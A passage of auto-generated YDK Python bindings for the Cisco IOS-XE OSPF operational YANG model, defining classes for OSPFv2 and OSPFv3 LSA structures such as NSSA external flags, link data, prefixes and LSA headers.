.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
"""
OSPFv3 prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
"""
OSPFv3 intra\-area prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class LinkScopeLsas(Entity):
"""
List OSPF link scope LSA
.. attribute:: lsa_type (key)
OSPF link scope LSA type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_scope_lsa
List of OSPF link scope LSAs
**type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa>`
**config**\: False
.. attribute:: area_scope_lsa
List OSPF area scope LSA databases
**type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__()
self.yang_name = "link-scope-lsas"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.link_scope_lsa = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
"""
List of OSPF link scope LSAs
.. attribute:: lsa_id (key)
LSA ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: version
Version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
OSPFv2 LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv2_unknown_tlv
OSPFv2 Unknown TLV
**type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>`
**config**\: False
.. attribute:: ospfv3_lsa_val
OSPFv3 LSA
**type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix_list
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>`
**config**\: False
.. attribute:: multi_topology
OSPF multi\-topology interface augmentation
**type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology>`
**config**\: False
.. attribute:: router_address
Router address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: tlv
Link TLV
**type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv>`
**config**\: False
.. attribute:: unknown_sub_tlv
OSPFv2 Unknown sub TLV
**type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__()
self.yang_name = "link-scope-lsa"
self.yang_parent_name = "link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_id','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
('version', (YLeaf(YType.uint32, 'version'), ['int'])),
('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
])
self.lsa_id = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.version = None
self.router_address = None
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
self.ospfv3_lsa_val.parent = self
self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv()
self.tlv.parent = self
self._children_name_map["tlv"] = "tlv"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv2_unknown_tlv = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix_list = YList(self)
self.ospfv3_ia_prefix = YList(self)
self.multi_topology = YList(self)
self.unknown_sub_tlv = YList(self)
self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
